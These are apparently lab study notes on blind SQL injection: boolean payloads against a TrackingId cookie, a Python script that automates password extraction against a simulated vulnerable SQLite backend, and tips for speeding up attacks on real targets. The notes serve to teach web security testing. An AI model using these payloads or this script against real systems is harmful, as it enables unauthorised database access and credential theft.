Blind SQL injection
Condition: the application returns no SQL results and no database error messages in its responses, so the result of an injected query cannot be read directly; only an indirect signal (different page content, or a different response time) is available.
Categorized into:
Boolean-based attack
TRUE OR FALSE (the page content differs depending on whether the injected condition holds)
Time-based attack
SLEEP (a conditional delay; the response time reveals whether the condition holds)
Cons
UNION-based injection will not work: the results of the injected query are never shown in the response
Boolean-based attack example:
Intercepted Request
Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4
Backend Processing
SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4'
TrackingId
is looked up to decide whether the visitor is a recognised (returning) user
Note: if the query returns a row, the page shows 'Welcome back'; the value selected by the query is never sent to the client because it is only processed in the backend. The presence or absence of 'Welcome back' is the only signal available.
Payload testing (the application's own closing quote terminates the injected string, so the payload ends with an unclosed '1)
TrackingId=u5YD3PapBcR4lN3e7Tj4' AND '1'='1 # TRUE: 'Welcome back' is shown
TrackingId=u5YD3PapBcR4lN3e7Tj4' AND '1'='2 # FALSE: 'Welcome back' is absent
Checking whether a users table exists
TrackingId=u5YD3PapBcR4lN3e7Tj4' AND (SELECT 'a' FROM users LIMIT 1)='a # 'Welcome back' only if the users table exists and has at least one row
Exploitation delivery
TrackingId=u5YD3PapBcR4lN3e7Tj4' AND (SELECT SUBSTRING(password,§1§,1) FROM users WHERE username='administrator')='§a§
SUBSTRING(password, 2, 1) extracts one character starting at position 2, i.e. the second character of the password; the third argument (1) is the length, so exactly one character is compared.
The § markers are Burp Intruder payload positions: the first iterates over the character position (1, 2, 3, ...), the second over the candidate characters (a-z, 0-9, ...).
If 'Welcome back' is returned for a candidate, that character is the one at that position of the password; repeat for every position until the whole password is recovered.
Tip: determine the password length first (e.g. AND (SELECT LENGTH(password) FROM users WHERE username='administrator')>5) so you know when to stop.
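The whole procedure above, automated, as an added example that is not part of the original notes. The backend is simulated with a constructed in-memory SQLite database (table names and the tracking id from the page; the administrator password 's3cr3t' is an assumption) that concatenates the cookie into the query exactly as the page's backend does. SUBSTR and LENGTH are used instead of SUBSTRING because both names are accepted by SQLite and MySQL:

```python
import sqlite3
import string

VALID_ID = "u5YD3PapBcR4lN3e7Tj4"


def build_db():
    """Constructed stand-in for the lab backend (not the page's own data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE TrackedUsers (TrackingId TEXT)")
    conn.execute("INSERT INTO TrackedUsers VALUES (?)", (VALID_ID,))
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('administrator', 's3cr3t'), ('wiener', 'peter')")
    return conn


def welcome_back(conn, tracking_id):
    """Vulnerable backend: the cookie value is concatenated into the query.
    Returns True when the page would show 'Welcome back' (query returned a row)."""
    query = f"SELECT TrackingId FROM TrackedUsers WHERE TrackingId = '{tracking_id}'"
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error:
        return False  # an error page is also 'no Welcome back'
    return row is not None


def oracle(conn, condition):
    """Boolean oracle: append a condition to the known-good id and observe the page.
    The application's own closing quote terminates the trailing '1."""
    return welcome_back(conn, f"{VALID_ID}' AND ({condition}) AND '1'='1")


def user_exists(conn, user):
    return oracle(conn, f"(SELECT 'a' FROM users WHERE username='{user}' LIMIT 1)='a'")


def password_length(conn, user, max_len=64):
    """Smallest n for which LENGTH(password) > n is false, i.e. the length itself."""
    for n in range(1, max_len + 1):
        if not oracle(conn, f"(SELECT LENGTH(password) FROM users WHERE username='{user}') > {n}"):
            return n
    return None


def extract_password(conn, user, charset=string.ascii_lowercase + string.digits):
    """Recover the password one position at a time, one candidate character per request."""
    if not user_exists(conn, user):
        return None
    length = password_length(conn, user)
    found = ""
    for pos in range(1, length + 1):
        for c in charset:
            # Same shape as the page's Intruder payload: SUBSTR(password, pos, 1) = 'c'
            if oracle(conn, f"(SELECT SUBSTR(password,{pos},1) FROM users WHERE username='{user}')='{c}'"):
                found += c
                break
        else:
            found += "?"  # character is outside the chosen charset
    return found


if __name__ == "__main__":
    db = build_db()
    print("users table present:", oracle(db, "(SELECT 'a' FROM users LIMIT 1)='a'"))
    print("administrator password:", extract_password(db, "administrator"))
```

Two caveats when moving this against a real target: every character costs one request per candidate, so a binary search on the character code (e.g. ASCII(SUBSTR(password,n,1)) > 109) cuts the request count to about seven per position; and MySQL's default collation compares strings case-insensitively, so a match on 'a' may really be 'A' and should be confirmed with a BINARY comparison, whereas SQLite (used here) compares case-sensitively.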